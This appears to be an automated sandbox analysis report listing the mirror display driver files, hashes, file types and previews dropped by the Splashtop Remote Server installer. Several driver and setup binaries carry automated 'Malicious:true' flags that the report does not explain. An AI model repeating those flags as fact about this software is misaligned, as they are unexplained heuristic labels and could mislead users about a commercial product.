                                                                                                                                                                                                                                                                                                                                  Preview:; mv2.inf..;..; Installation inf for the Mirror graphics adapter...;..;....[Version]..Signature="$CHICAGO$"..Provider=%Cyberfox%..ClassGUID={4D36E968-E325-11CE-BFC1-08002BE10318}..Class=Display..DriverVer=04/11/2007,6.0.1.0..CatalogFile="mv2.cat"....[DestinationDirs]..DefaultDestDir = 11..mv2.Miniport = 12 ; drivers..mv2.Display = 11 ; system32....;..; Driver information..;....[Manufacturer]..%Cyberfox% = stdMfg,NTamd64....[stdMfg.NTamd64]..%Winmv2% = mv2, mv_hook_display_driver2....;..; General installation section..;....[mv2]..CopyFiles=mv2.Miniport, mv2.Display....;..; File sections..;....[mv2.Miniport]..mv2.sys....[mv2.Display]..mv2.dll......;..; Service Installation..;....[mv2.Services]..AddService = mv2, 0x00000002, mv2_Service_Inst, mv2_EventLog_Inst....[mv2_Service_Inst]....ServiceType = 1 ; SERVICE_KERNEL_DRIVER..StartType = 1 ; SERVICE_SYSTEM_START..ErrorControl = 0 ; SERVICE_ERROR_IGNORE..LoadOrderGroup =

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\vista64\driver\mv2.sys

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):11712
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.137352195821723
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:8hD6YJoIo6vyowJL/aoxhHoe068jSJUbueqycZ:8hD6YaD8YJLFHJ06dUb+BZ
                                                                                                                                                                                                                                                                                                                                  MD5:4B6B1EF53636E2C5A9EB9AF291970073
                                                                                                                                                                                                                                                                                                                                  SHA1:868C5A226293EEB37C513E106A80B9EE9A01684A
                                                                                                                                                                                                                                                                                                                                  SHA-256:25444A485A800E2609AD56179146DD24C41E3E56A10969037D4914BAA452DF53
                                                                                                                                                                                                                                                                                                                                  SHA-512:05B3D52E62ABB995B3EA4BEBE7C3D18354124772D97287BAAF4474ADBF9BD537AC258974C1C0B2EC1C7E3779D27D411FE74550FEA77A36D06A6D99FFD0628A7F
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:f.q[..q[..q[..q[..r[..V.s.t[..V.u.p[..V.e.r[..V.y.p[..V.t.p[..V.p.p[..Richq[..........PE..d...p .G.........."..................P.......................................p......cQ......................................................dP..<....`.......@......................0 ............................................... ..(............................text...`........................... ..h.rdata....... ......................@..H.data........0......................@....pdata.......@......................@..HINIT.... ....P...................... ....rsrc........`......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\vista64\install.bat

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.625
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3:6FMLVJ:uMLVJ
                                                                                                                                                                                                                                                                                                                                  MD5:903B157DCA56861C845179D4D1C5E930
                                                                                                                                                                                                                                                                                                                                  SHA1:E6B5ED1511F1F14F0436CA474FF457CB340E7C60
                                                                                                                                                                                                                                                                                                                                  SHA-256:8402E0C9189FA6EF6EF8E955606C5A20F880F1106EA5F81304E42A0864F078F8
                                                                                                                                                                                                                                                                                                                                  SHA-512:53F5BE22FD9B12FF9D084A65BE63BFA7A9B5489A5D95263343EE0DB3CE749B1B6D0999AC3CC34B23A4A970F3F02DD7ED1199269C12C8B59313FF58B225774006
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:setupdrv install

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\vista64\license.txt

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (396), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1150
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.872615036376876
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24:0oSneisewrWYSaizLwupc5KEQbEE+H+s+joMyyeDbE7upgO8+jaUZN:2sQ1Rpc5DQo9+s+1yy7ipgl+NL
                                                                                                                                                                                                                                                                                                                                  MD5:624A16979822CA9E244602EF815E4FCF
                                                                                                                                                                                                                                                                                                                                  SHA1:FF39FD4A7EE12C5190144E2F28AB5D7DB2A3F435
                                                                                                                                                                                                                                                                                                                                  SHA-256:18D357C3792C89E9A8FC127E65A81BE919BEC7166E537ECA080478E0370E61C6
                                                                                                                                                                                                                                                                                                                                  SHA-512:491EB3288F3753FB18DF1E1F634C07ECA7FF6970C6CE6778E0EB0C4FB1EC0A8E490C1273A0183CAC221DB8750B03FCDE5B7B03FBF8A98A5C43048523C7CE37C3
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:1. GRANT OF LICENSE:......RDV-Soft hereby grants Ultr@VNC Team -non-exclusive, royalty-free, worldwide, perpetual license to distribute, use the software product "Mirror driver" in binary form for their remote controle software. Ultr@VNC Team hereby grants the end-user the right to use and distribute the software product "Mirror Driver" with "Ultr@VNC"..... ....2. LIMITED WARRANTY......NO WARRANTY. To the maximum extent permitted by applicable law, We expressly disclaims any warranty for the SOFTWARE PRODUCT "Mirror Driver". The SOFTWARE PRODUCT "Mirror Driver" and any related documentation are provided "as is" without warranty of any kind, either express or implied, including, without limitation, the implied warranties of merchantability or fitness for a particular purpose...NO LIABILITY FOR CONSEQUENTIAL DAMAGES. To the maximum extent permitted by applicable law, in no event shall we be liable for any damages whatsoever (including, without limitation, damages for loss of business pro

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\vista64\setupdrv.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):90688
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.200545275172027
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:I/QY76jVjfCCHOLvctoA3eDDjEcUVzDOhtMRFS3CZiR3IeSkuH5ysQyMXq:I/QNjfCEoAOD0cUVWhmRLARnSDH5y1yv
                                                                                                                                                                                                                                                                                                                                  MD5:6C788D13DEDCD6EB9E022ACA8BD1C3FA
                                                                                                                                                                                                                                                                                                                                  SHA1:741A5342618A0AF7AC6E3F947FB3BC128477E237
                                                                                                                                                                                                                                                                                                                                  SHA-256:0BB050B230CA684DE7021D9B66303C71F408885163B20166E7047C223E0EE01E
                                                                                                                                                                                                                                                                                                                                  SHA-512:9CEEBC23EF82A302250291B0D3584F9CE9328DEA8850F49A3473B6B5392FCE4299AC0535A0F9AAF0A22047293DFD2AC70DF4002E21BF7B1BB1711E9984C9BC33
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......../...Nx..Nx..Nx.....Nx......Nx.....Nx..Ny.ENx......Nx......Nx......Nx.Rich.Nx.................PE..d....T.G..........#..........n.......E.........@.....................................8......................................................."..x....................L..@............................................................................................text............................... ..`.rdata...@.......B..................@..@.data...d=...@....... ..............@....pdata...............6..............@..@.rsrc................B..............@..@........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\vista64\uninstall.bat

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):411
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.977180725182127
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12:kCdGk3hd0E23B1047V1j47V1u471kgAq3Gn3C:/1RqXRC4R94RQ4dAqqy
                                                                                                                                                                                                                                                                                                                                  MD5:2203EE251159885EF20D6970F67529C3
                                                                                                                                                                                                                                                                                                                                  SHA1:D775009C08D7EC7F684FC7B657DDC7BCB7DA94C6
                                                                                                                                                                                                                                                                                                                                  SHA-256:C3D0070A0EA5BB0708565930199C77E7DC4BFC31A6B368B2F8A7B0239E739304
                                                                                                                                                                                                                                                                                                                                  SHA-512:3A1BBF3F460DCDCDE1DE3D5F345973D1827EB717AB7FCA3C3DE5A12E324125EF94D7FFC34F664D5C1763790E3A4189F065DFCA4E0E7FB43E4BEC0DA32255E785
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:echo off..cd %~dp0....\utils\devcon64.exe remove mv_hook_display_driver2 >> inst.log....\utils\devcon64.exe rescan >> inst.log..ver | find /i "5.1." > nul..if %errorlevel%==0 GOTO End..ver | find /i "5.2." > nul..if %errorlevel%==0 GOTO End..ver | find /i "6.0." > nul..if %errorlevel%==0 GOTO End....\utils\DIFxCmd64.exe /u driver\mv2.inf >> inst.log..:End....sc stop mv2 >> inst.log..sc delete mv2 >> inst.log

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\vista\driver\mv2.cat

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):8367
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.270789935373524
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:+90+LRJoIo6vyowJL/aoxhHoe068jSJUbueqNb:eBRaD8YJLFHJ06dUb+Nb
                                                                                                                                                                                                                                                                                                                                  MD5:80D00FB5201EE5E66D8230B8440A7643
                                                                                                                                                                                                                                                                                                                                  SHA1:0DD971723322BB0EC8D7EF71D6389F839F6EBE30
                                                                                                                                                                                                                                                                                                                                  SHA-256:C17A1DE10DF4DF8A51E1EE7EDB209E6DEBF34285E327A7C669EF0E04E1BED72C
                                                                                                                                                                                                                                                                                                                                  SHA-512:C01F6AB36E2007E18DE27B46CB51BC8896AF5666FE18F39DADB0DC90B0DAAC2AB6580F31B0B15BD83D5453932A1299AE17E8DBA298D20B656945DEB0506F6AB5
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:0. ...*.H........ .0. ....1.0...+......0..a..+.....7.....R0..N0...+.....7.......r..V5B.r/.9.V...081005153046Z0...+.....7.....0...0....R8.3.5.1.9.D.3.B.C.A.9.2.3.C.F.2.9.A.9.3.D.9.2.E.A.4.1.3.A.5.C.E.D.E.5.B.B.E.0.0...1..702..+.....7...1$0"...F.i.l.e........m.v.2...s.y.s...02..+.....7...1$0"...O.S.A.t.t.r........2.:.6...0...0b..+.....7...1T0R.L.{.C.6.8.9.A.A.B.8.-.8.E.7.8.-.1.1.D.0.-.8.C.4.7.-.0.0.C.0.4.F.C.2.9.5.E.E.}....0i..+.....7...1[0Y04..+.....7...0&..... .....<.<.<.O.b.s.o.l.e.t.e.>.>.>0!0...+.........Q.;.<........[..0....R8.7.E.8.4.F.A.7.5.6.B.9.8.F.1.4.3.7.F.F.8.F.8.D.D.9.A.2.D.C.B.6.D.0.6.2.8.5.1.5...1../02..+.....7...1$0"...F.i.l.e........m.v.2...i.n.f...02..+.....7...1$0"...O.S.A.t.t.r........2.:.6...0...0a..+.....7...1S0Q0,..+.....7........<.<.<.O.b.s.o.l.e.t.e.>.>.>0!0...+..........O.V...7......b..0b..+.....7...1T0R.L.{.D.E.3.5.1.A.4.2.-.8.E.5.9.-.1.1.D.0.-.8.C.4.7.-.0.0.C.0.4.F.C.2.9.5.E.E.}....0....RD.7.9.F.6.E.3.3.5.F.D.E.2.3.6.B.8.1.F.9.D.B.0.D.4.2.F.1.4.8.4.B.7.B

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\vista\driver\mv2.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (native) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):23488
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.423731919049599
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:QvTfgigZKPBRDwvp5BY83HV8diQFHbsQaD8YJLFHJ06dUb+DQ:QLfpqKZRDMq6HV89HbsQSLwJiDQ
                                                                                                                                                                                                                                                                                                                                  MD5:55CB63E6661D7A911C74BF39986336AB
                                                                                                                                                                                                                                                                                                                                  SHA1:1F26A92347F58DC9616B611F1E8A29E0E6B94D67
                                                                                                                                                                                                                                                                                                                                  SHA-256:9C5E913DB4B4BE861EEC63C071FBCC6A3BC60A0D11949EC47251780508A83E25
                                                                                                                                                                                                                                                                                                                                  SHA-512:B31838612588A4CA9BB6B7D5DD0EABB69BF8FD41170FA71A0D7357D31BAFDF3075F0DE070160AFB58DAACEC5BB47EF34316E652DE9421B186F91BDCAA2BF58A2
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........8..k..k..k..k..k.*.k..k.*.k..k.*.k..k.*.k..k.*.k..kRich..k................PE..L...h..H...........!.....,...........1.......@......................................^a.......................................`..(....p...............@..............p@...............................................@..p............................text....&.......(.................. ..h.rdata..q....@.......,..............@..H.data...@....P.......0..............@...INIT....r....`.......4.............. ....rsrc........p.......8..............@..B.reloc...............<..............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\vista\driver\mv2.inf

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Windows setup INFormation
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):2243
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.362010783542873
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:ehVVpvnf4+BCs0j/9XSvFhb54y83WhJhdYpBBN22wlFTP/7bp:MJfJ0di4yMyAXDwlFLB
                                                                                                                                                                                                                                                                                                                                  MD5:AEA986639139A63559A39BE4A9986B39
                                                                                                                                                                                                                                                                                                                                  SHA1:87E84FA756B98F1437FF8F8DD9A2DCB6D0628515
                                                                                                                                                                                                                                                                                                                                  SHA-256:78A01CCC86628727E603A74BF008DBD95B465031EFA6FB52AB9496293E8470E1
                                                                                                                                                                                                                                                                                                                                  SHA-512:37E092646B88E45962737ED696C575F944E15BAD3884442A60D7DE427E8669AE1B3C578CE959D2D304A7668CC84F8F3E0C220A4988D4C15197228466456B3878
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:; mv2.inf..;..; Installation inf for the Mirror graphics adapter...;..;....[Version]..Signature="$CHICAGO$"..Provider=%Cyberfox%..ClassGUID={4D36E968-E325-11CE-BFC1-08002BE10318}..Class=Display..DriverVer=04/11/2007,6.0.1.0..CatalogFile="mv2.cat"....[DestinationDirs]..DefaultDestDir = 11..mv2.Miniport = 12 ; drivers..mv2.Display = 11 ; system32....;..; Driver information..;....[Manufacturer]..%Cyberfox% = stdMfg....[stdMfg]..%Winmv2% = mv2, mv_hook_display_driver2....;..; General installation section..;....[mv2]..CopyFiles=mv2.Miniport, mv2.Display....;..; File sections..;....[mv2.Miniport]..mv2.sys....[mv2.Display]..mv2.dll......;..; Service Installation..;....[mv2.Services]..AddService = mv2, 0x00000002, mv2_Service_Inst, mv2_EventLog_Inst....[mv2_Service_Inst]....ServiceType = 1 ; SERVICE_KERNEL_DRIVER..StartType = 1 ; SERVICE_SYSTEM_START..ErrorControl = 0 ; SERVICE_ERROR_IGNORE..LoadOrderGroup = Video..ServiceBi

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\vista\driver\mv2.sys

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (native) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):11712
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.022711070794495
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:+SniyJoIo6vyowJL/aoxhHoe068jSJUbueqrII:OyaD8YJLFHJ06dUb+J
                                                                                                                                                                                                                                                                                                                                  MD5:B435F95592AD8E6FC3BACD4A7E89B614
                                                                                                                                                                                                                                                                                                                                  SHA1:287FA71A499CB6AA7E806BB6106C7401CD504ACA
                                                                                                                                                                                                                                                                                                                                  SHA-256:331F200BCEA80E55743CE8CCF49B18785F70CAF21C13B15FBA9A3A9D32C6A46E
                                                                                                                                                                                                                                                                                                                                  SHA-512:53373208640AC22F23B4C56D9C9AC32E0837314E736D14FEAF2A571594886A3D6EF42B875980D39FBE9103C101CDAED43740EB026FFFA6019503E39A85E38086
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}K..9*r.9*r.9*r.9*s.:*r.....<*r.....;*r.....8*r.....8*r.Rich9*r.........................PE..L...j .G.............................@....... ...............................p.......b......................................H@..<....P.......................`..0... ............................................... ...............................text............................... ..h.rdata....... ......................@..H.data........0......................@...INIT.........@...................... ....rsrc........P......................@..B.reloc..V....`......................@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\vista\install.bat

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.625
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3:6FMLVJ:uMLVJ
                                                                                                                                                                                                                                                                                                                                  MD5:903B157DCA56861C845179D4D1C5E930
                                                                                                                                                                                                                                                                                                                                  SHA1:E6B5ED1511F1F14F0436CA474FF457CB340E7C60
                                                                                                                                                                                                                                                                                                                                  SHA-256:8402E0C9189FA6EF6EF8E955606C5A20F880F1106EA5F81304E42A0864F078F8
                                                                                                                                                                                                                                                                                                                                  SHA-512:53F5BE22FD9B12FF9D084A65BE63BFA7A9B5489A5D95263343EE0DB3CE749B1B6D0999AC3CC34B23A4A970F3F02DD7ED1199269C12C8B59313FF58B225774006
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:setupdrv install

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\vista\license.txt

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (396), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1150
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.872615036376876
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24:0oSneisewrWYSaizLwupc5KEQbEE+H+s+joMyyeDbE7upgO8+jaUZN:2sQ1Rpc5DQo9+s+1yy7ipgl+NL
                                                                                                                                                                                                                                                                                                                                  MD5:624A16979822CA9E244602EF815E4FCF
                                                                                                                                                                                                                                                                                                                                  SHA1:FF39FD4A7EE12C5190144E2F28AB5D7DB2A3F435
                                                                                                                                                                                                                                                                                                                                  SHA-256:18D357C3792C89E9A8FC127E65A81BE919BEC7166E537ECA080478E0370E61C6
                                                                                                                                                                                                                                                                                                                                  SHA-512:491EB3288F3753FB18DF1E1F634C07ECA7FF6970C6CE6778E0EB0C4FB1EC0A8E490C1273A0183CAC221DB8750B03FCDE5B7B03FBF8A98A5C43048523C7CE37C3
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:1. GRANT OF LICENSE:......RDV-Soft hereby grants Ultr@VNC Team -non-exclusive, royalty-free, worldwide, perpetual license to distribute, use the software product "Mirror driver" in binary form for their remote controle software. Ultr@VNC Team hereby grants the end-user the right to use and distribute the software product "Mirror Driver" with "Ultr@VNC"..... ....2. LIMITED WARRANTY......NO WARRANTY. To the maximum extent permitted by applicable law, We expressly disclaims any warranty for the SOFTWARE PRODUCT "Mirror Driver". The SOFTWARE PRODUCT "Mirror Driver" and any related documentation are provided "as is" without warranty of any kind, either express or implied, including, without limitation, the implied warranties of merchantability or fitness for a particular purpose...NO LIABILITY FOR CONSEQUENTIAL DAMAGES. To the maximum extent permitted by applicable law, in no event shall we be liable for any damages whatsoever (including, without limitation, damages for loss of business pro

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\vista\setupdrv.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):81920
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.9219061141523825
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:1zCCrWvSRU7VEBmGDnw29Gz07X83JlcytyCpw:1zCCrM7Uio83JljtyIw
                                                                                                                                                                                                                                                                                                                                  MD5:50F6A9509729A6D8D97E29AD259C6A1E
                                                                                                                                                                                                                                                                                                                                  SHA1:1AEADFC64CD4D6B9D878F93999A4D571936CCA91
                                                                                                                                                                                                                                                                                                                                  SHA-256:C8B3049C278B7E3FE2CFE4D84096A292CC14557EBCC02B8998EB14C83289EB8F
                                                                                                                                                                                                                                                                                                                                  SHA-512:71660BEE4D58074B05538DA18F905CBFAF1567C60AA02F7C979571F3D21AC2AD56F19B3B7FEB2430686302222932CB901B0B895C16076EF1963CC93C94311769
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........p..p..p......p......p.n....p..p."p......p......p......p.Rich.p.................PE..L.....H.....................`.......<............@..........................p......z_..........................................x....`..4...............................................................@............................................text............................... ..`.rdata...0.......@..................@..@.data...d3... ....... ..............@....rsrc...4....`.......0..............@..@................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\vista\uninstall.bat

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):405
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.932556842608647
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12:kCdgk3hdyE23B1047V1j47V1u47jkgAq3Gn3C:/jR8XRC4R94RQ43Aqqy
                                                                                                                                                                                                                                                                                                                                  MD5:00A98380A84308DFEDB409827DB9C916
                                                                                                                                                                                                                                                                                                                                  SHA1:F31EC578108616125450187C709B6E133425BC25
                                                                                                                                                                                                                                                                                                                                  SHA-256:948C84A52F8847798150629B396E29857C0C7EB77550276A000E02B2B9C85A4E
                                                                                                                                                                                                                                                                                                                                  SHA-512:73AFAEB0394B470102A05D6E7F1195E60BEFE5469241C5ED182032AC80E54196945E7E9AA9AC2391DC13528E06F3D6C165C4083ECFE6B6F07A1E8F2E30AA5A8E
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:echo off..cd %~dp0....\utils\devcon.exe remove mv_hook_display_driver2 >> inst.log....\utils\devcon.exe rescan >> inst.log..ver | find /i "5.1." > nul..if %errorlevel%==0 GOTO End..ver | find /i "5.2." > nul..if %errorlevel%==0 GOTO End..ver | find /i "6.0." > nul..if %errorlevel%==0 GOTO End....\utils\DIFxCmd.exe /u driver\mv2.inf >> inst.log..:End....sc stop mv2 >> inst.log..sc delete mv2 >> inst.log

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\xp64\driver\mv2.cat

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):8403
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.26515273733877
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:VafwaRJoIo6vyowJL/aoxhHoe068jSJUbueqO0:VQRaD8YJLFHJ06dUb+O0
                                                                                                                                                                                                                                                                                                                                  MD5:9B3AB5B97500F2C39C75EA2910BC6420
                                                                                                                                                                                                                                                                                                                                  SHA1:42267EA620E0EF5B0F4DBF25B705F1B3C4D03649
                                                                                                                                                                                                                                                                                                                                  SHA-256:32557B63B75CE1DBB761C22092E130561FE6B156CD1D0F96E809E8D0A32E89A6
                                                                                                                                                                                                                                                                                                                                  SHA-512:BFEBCC8BA47E7E0F7FA6218E2A057C3ADD8C570B839ACA3F159495024028A9F6408143FB7A34F2EAD66278401898150A497339BEF3E671A3212055EC73056009
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
